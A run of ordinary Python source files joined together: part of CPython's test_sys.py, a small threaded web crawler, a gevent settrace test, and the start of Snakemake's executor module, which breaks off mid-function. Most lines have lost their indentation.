env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# has no effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
x = inspect.currentframe()
check(x, size('3Pi3c'))
# function
def func(): pass
check(func, size('14Pi'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'5P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
Crawler.py
|
import FileSystem, re
from threading import Thread
from urllib.parse import quote
from Webpage import Webpage
from colorama import Fore, Style
class Crawler(object):
def __init__(self, urls):
self.urls = urls
self.found_urls = []
self.threads = []
    def error(self, err, err_code):
        print(Fore.RED + 'CRAWLER error %s: %s' % (err_code, err))
        print(Style.RESET_ALL)
    def crawl(self):
        if self.urls:
            while len(self.urls) > 0:
                # Pass the callable and its argument separately so the request
                # actually runs inside the new thread.
                t = Thread(target=self.get_url_contents, args=(self.urls[0],))
                t.daemon = True
                t.start()
                self.threads.append(t)
                del self.urls[0]
# Set page in filesystem
def set_page(self, url, page_contents):
url = re.sub('^(http://|https://)?', '', url)
url = quote(url)
        # Create a directory and write the page contents into a file.
FileSystem.set_data(url, page_contents)
def get_url_contents(self, url):
# Get url contents
page = Webpage(url)
response = page.get_page()
try:
            if response != '':
self.set_page(url, response)
except Exception as e:
self.error(e, '0x1')
        if response != '':
anchors = page.get_anchors(response)
# Repeat the crawl function for every anchor found
for anchor in anchors:
self.found_urls.append(anchor[0])
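# A minimal usage sketch for the Crawler above, assuming the local Webpage and
# FileSystem modules behave as they are used in this file; the seed URL is
# illustrative only.
if __name__ == '__main__':
    crawler = Crawler(['http://example.com'])
    crawler.crawl()
    # Wait for the worker threads before inspecting the discovered links.
    for worker in crawler.threads:
        worker.join()
    print(crawler.found_urls)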
|
test__threading_vs_settrace.py
|
from __future__ import print_function
import sys
import subprocess
import unittest
import gevent.thread
script = """
from gevent import monkey
monkey.patch_all()
import sys, os, threading, time
# A deadlock-killer, to prevent the
# testsuite from hanging forever
def killer():
time.sleep(0.1)
sys.stdout.write('..program blocked; aborting!')
sys.stdout.flush()
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
def trace(frame, event, arg):
if threading is not None:
threading.currentThread()
return trace
def doit():
sys.stdout.write("..thread started..")
def test1():
t = threading.Thread(target=doit)
t.start()
t.join()
sys.settrace(None)
sys.settrace(trace)
if len(sys.argv) > 1:
test1()
sys.stdout.write("..finishing..")
"""
class ThreadTrace(unittest.TestCase):
def test_untraceable_lock(self):
if hasattr(sys, 'gettrace'):
old = sys.gettrace()
else:
old = None
lst = []
try:
def trace(frame, ev, arg):
lst.append((frame.f_code.co_filename, frame.f_lineno, ev))
print("TRACE: %s:%s %s" % lst[-1])
return trace
with gevent.thread.allocate_lock():
sys.settrace(trace)
finally:
sys.settrace(old)
self.failUnless(lst == [], "trace not empty")
def run_script(self, more_args=[]):
rc = subprocess.call([sys.executable, "-c", script] + more_args)
self.failIf(rc == 2, "interpreter was blocked")
self.failUnless(rc == 0, "Unexpected error")
def test_finalize_with_trace(self):
self.run_script()
def test_bootstrap_inner_with_trace(self):
self.run_script(["1"])
if __name__ == "__main__":
try:
from test import support
except ImportError:
from test import test_support as support
support.run_unittest(ThreadTrace)
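# The pattern exercised above, in condensed form (a sketch, independent of
# gevent): install a trace function only around the code of interest and always
# restore the previous one, so unrelated threads are not traced. `my_trace` and
# `do_traced_work` are placeholders.
#
#   old_trace = sys.gettrace()
#   sys.settrace(my_trace)
#   try:
#       do_traced_work()
#   finally:
#       sys.settrace(old_trace)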
|
__init__.py
|
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2022, Johannes Köster"
__email__ = "johannes.koester@uni-due.de"
__license__ = "MIT"
from abc import abstractmethod
import os
import sys
import contextlib
import time
import datetime
import json
import textwrap
import stat
import shutil
import shlex
import threading
import concurrent.futures
import subprocess
import signal
import tempfile
import threading
from functools import partial
from itertools import chain
from collections import namedtuple
from snakemake.executors.common import format_cli_arg, format_cli_pos_arg, join_cli_args
from snakemake.io import _IOFile
import random
import base64
import uuid
import re
import math
from snakemake.jobs import Job
from snakemake.shell import shell
from snakemake.logging import logger
from snakemake.stats import Stats
from snakemake.utils import format, Unformattable, makedirs
from snakemake.io import get_wildcard_names, Wildcards
from snakemake.exceptions import print_exception, get_exception_origin
from snakemake.exceptions import format_error, RuleException, log_verbose_traceback
from snakemake.exceptions import (
ProtectedOutputException,
WorkflowError,
ImproperShadowException,
SpawnedJobError,
CacheMissException,
)
from snakemake.common import (
Mode,
__version__,
get_container_image,
get_uuid,
lazy_property,
)
# TODO move each executor into a separate submodule
def sleep():
# do not sleep on CI. In that case we just want to quickly test everything.
if os.environ.get("CI") != "true":
time.sleep(10)
else:
time.sleep(1)
class AbstractExecutor:
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
printthreads=True,
keepincomplete=False,
):
self.workflow = workflow
self.dag = dag
self.quiet = quiet
self.printreason = printreason
self.printshellcmds = printshellcmds
self.printthreads = printthreads
self.latency_wait = workflow.latency_wait
self.keepincomplete = keepincomplete
def get_default_remote_provider_args(self):
return join_cli_args(
[
self.workflow_property_to_arg("default_remote_prefix"),
self.workflow_property_to_arg("default_remote_provider", attr="name"),
]
)
def get_set_resources_args(self):
return format_cli_arg(
"--set-resources",
[
f"{rule}:{name}={value}"
for rule, res in self.workflow.overwrite_resources.items()
for name, value in res.items()
],
skip=not self.workflow.overwrite_resources,
)
def get_default_resources_args(self, default_resources=None):
default_resources = default_resources or self.workflow.default_resources
return format_cli_arg("--default-resources", default_resources.args)
def run_jobs(self, jobs, callback=None, submit_callback=None, error_callback=None):
"""Run a list of jobs that is ready at a given point in time.
By default, this method just runs each job individually.
This method can be overwritten to submit many jobs in a more efficient way than one-by-one.
Note that in any case, for each job, the callback functions have to be called individually!
"""
for job in jobs:
self.run(
job,
callback=callback,
submit_callback=submit_callback,
error_callback=error_callback,
)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
"""Run a specific job or group job."""
self._run(job)
callback(job)
def shutdown(self):
pass
def cancel(self):
pass
def _run(self, job):
job.check_protected_output()
self.printjob(job)
def rule_prefix(self, job):
return "local " if job.is_local else ""
def printjob(self, job):
job.log_info(skip_dynamic=True)
def print_job_error(self, job, msg=None, **kwargs):
job.log_error(msg, **kwargs)
def handle_job_success(self, job):
pass
def handle_job_error(self, job):
pass
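# A minimal sketch (not part of Snakemake) of how AbstractExecutor is meant to
# be specialized: run_jobs() hands over the ready jobs one by one, and run()
# has to invoke callback(job) on success or error_callback(job) on failure.
# The class name and body are purely illustrative.
class _ExampleNoopExecutor(AbstractExecutor):
    def run(self, job, callback=None, submit_callback=None, error_callback=None):
        super()._run(job)  # protected-output check and job logging
        try:
            # A real backend would actually execute the job here.
            callback(job)
        except Exception:
            error_callback(job)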
class DryrunExecutor(AbstractExecutor):
def printjob(self, job):
super().printjob(job)
if job.is_group():
for j in job.jobs:
self.printcache(j)
else:
self.printcache(job)
def printcache(self, job):
if self.workflow.is_cached_rule(job.rule):
if self.workflow.output_file_cache.exists(job):
logger.info(
"Output file {} will be obtained from global between-workflow cache.".format(
job.output[0]
)
)
else:
logger.info(
"Output file {} will be written to global between-workflow cache.".format(
job.output[0]
)
)
class RealExecutor(AbstractExecutor):
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
assume_shared_fs=True,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
keepincomplete=keepincomplete,
)
self.assume_shared_fs = assume_shared_fs
self.stats = Stats()
self.snakefile = workflow.main_snakefile
def register_job(self, job):
job.register()
def _run(self, job, callback=None, error_callback=None):
super()._run(job)
self.stats.report_job_start(job)
try:
self.register_job(job)
except IOError as e:
logger.info(
"Failed to set marker file for job started ({}). "
"Snakemake will work, but cannot ensure that output files "
"are complete in case of a kill signal or power loss. "
"Please ensure write permissions for the "
"directory {}".format(e, self.workflow.persistence.path)
)
def handle_job_success(
self,
job,
upload_remote=True,
handle_log=True,
handle_touch=True,
ignore_missing_output=False,
):
job.postprocess(
upload_remote=upload_remote,
handle_log=handle_log,
handle_touch=handle_touch,
ignore_missing_output=ignore_missing_output,
latency_wait=self.latency_wait,
assume_shared_fs=self.assume_shared_fs,
keep_metadata=self.workflow.keep_metadata,
)
self.stats.report_job_end(job)
def handle_job_error(self, job, upload_remote=True):
job.postprocess(
error=True,
assume_shared_fs=self.assume_shared_fs,
latency_wait=self.latency_wait,
)
def workflow_property_to_arg(
self, property, flag=None, quote=True, skip=False, invert=False, attr=None
):
if skip:
return ""
value = getattr(self.workflow, property)
if value is not None and attr is not None:
value = getattr(value, attr)
if flag is None:
